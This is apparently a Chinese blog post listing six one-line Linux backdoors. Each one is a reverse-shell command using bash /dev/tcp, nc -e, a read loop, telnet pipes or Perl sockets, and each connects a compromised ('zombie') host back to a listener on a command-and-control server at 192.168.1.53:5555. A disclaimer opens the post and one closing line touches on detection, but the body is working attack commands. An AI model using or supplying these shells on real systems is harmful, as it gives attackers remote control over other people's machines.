linux环境一句话后门

linux环境一句话后门

注意:本文章只做网络安全技术交流使用,切莫用来做坏事。

也可以叫一句话木马,一个意思。

设置监听

回连端口可以用 ncat 工具。此处用 192.168.1.53 作为CC服务端的示例,这些后门回连到此服务器。

例如,在CC服务器上运行:nc -lvnp 5555 则监听5555端口,作为后门的回连端口。

第一种方法:

bash -i >&/dev/tcp/192.168.1.53/5555 0>&1

第二种方法:

nc -e /bin/bash 192.168.1.53 5555

第三种方法:

exec 5<>/dev/tcp/192.168.1.53/5555 ; cat <&5 | while read line ; do $line 2>&5 >&5 ; done

第四种方法:

telnet 192.168.1.53 5555 | /bin/bash | telnet 192.168.1.53 6666

5555端口输入,6666端口输出。此处需要 ncat 在CC服务器监听两个端口

第五种方法:

perl -e 'use Socket;$i="192.168.1.53";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

第六种方法:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"192.168.1.53:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'


还有别的方法,可以自己探索。虽然方法比较多,但是基本原理都一样。在 肉鸡 上回连到 CC 服务器,把输入输出重定向到 回连CC服务器的tcp连接中;CC 发送的数据,用shell(bash、dash等)脚本执行后,把指令结果返回给 CC 服务器。这样一个简单的后门就成了。

这种后门还是比较好检测的,自己运行一下,从操作历史记录、进程、端口连接、系统日志中找一些特征就可以识别到此后门。快检查一下自己服务器上有没有这些后门吧。

评论

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注